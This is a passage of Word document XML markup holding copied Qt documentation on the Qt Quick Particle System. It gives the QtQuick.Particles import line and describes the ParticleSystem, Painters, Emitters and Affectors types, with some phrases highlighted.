          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="752" w:name="related-information"/>
      <w:bookmarkStart w:id="753" w:name="_Toc483000690"/>
      <w:bookmarkStart w:id="754" w:name="_Toc483003707"/>
      <w:bookmarkStart w:id="755" w:name="_Toc483604042"/>
      <w:bookmarkStart w:id="756" w:name="_Toc483605262"/>
      <w:bookmarkEnd w:id="752"/>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Related information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="753"/>
      <w:bookmarkEnd w:id="754"/>
      <w:bookmarkEnd w:id="755"/>
      <w:bookmarkEnd w:id="756"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId568" w:history="1">
        <w:r w:rsidR="00242E0B" w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId569" w:history="1">
        <w:r w:rsidR="00242E0B" w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt Quick Controls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId570" w:history="1">
        <w:r w:rsidR="00242E0B" w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt Quick Controls Examples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00242E0B" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId571" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtquick/qtquick-effects-particles.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="757" w:name="_Toc483000691"/>
      <w:bookmarkStart w:id="758" w:name="_Toc483003708"/>
      <w:bookmarkStart w:id="759" w:name="_Toc483604043"/>
      <w:bookmarkStart w:id="760" w:name="_Toc483605263"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the Qt Quick Particle System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="757"/>
      <w:bookmarkEnd w:id="758"/>
      <w:bookmarkEnd w:id="759"/>
      <w:bookmarkEnd w:id="760"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Documentation for all Particle System types can be found on the</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId572" w:history="1">
        <w:r w:rsidRPr="004375A9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick.Particles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module page</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that to use types from the particles module, you will need to </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the types with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Particles </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="761" w:name="the-particlesystem"/>
      <w:bookmarkStart w:id="762" w:name="_Toc483000692"/>
      <w:bookmarkStart w:id="763" w:name="_Toc483003709"/>
      <w:bookmarkStart w:id="764" w:name="_Toc483604044"/>
      <w:bookmarkStart w:id="765" w:name="_Toc483605264"/>
      <w:bookmarkEnd w:id="761"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The ParticleSystem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="762"/>
      <w:bookmarkEnd w:id="763"/>
      <w:bookmarkEnd w:id="764"/>
      <w:bookmarkEnd w:id="765"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This particle system contains </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>four main</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> types of QML types:</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId573" w:history="1">
        <w:r w:rsidRPr="004375A9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Painters</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Emitters</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affectors</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId574" w:history="1">
        <w:r w:rsidRPr="004375A9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type ties</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all the other types together, </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and manages the shared timeline</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Painters, Emitters and Affectors </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must all have the same</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId575" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be able to interact with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="004375A9" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You may </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have as many</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ParticleSystems as you want subject to this constraint, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logical separation</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to have one</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId576" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for all the types that you want to interact, or just one if the number of types is small and they</w:t>
      </w:r>
      <w:r w:rsidR="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are easily kept under control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="766" w:name="logical-particles"/>
      <w:bookmarkStart w:id="767" w:name="_Toc483000693"/>
      <w:bookmarkStart w:id="768" w:name="_Toc483003710"/>
      <w:bookmarkStart w:id="769" w:name="_Toc483604045"/>
      <w:bookmarkStart w:id="770" w:name="_Toc483605265"/>
      <w:bookmarkEnd w:id="766"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logical Particles</w:t>
      </w:r>
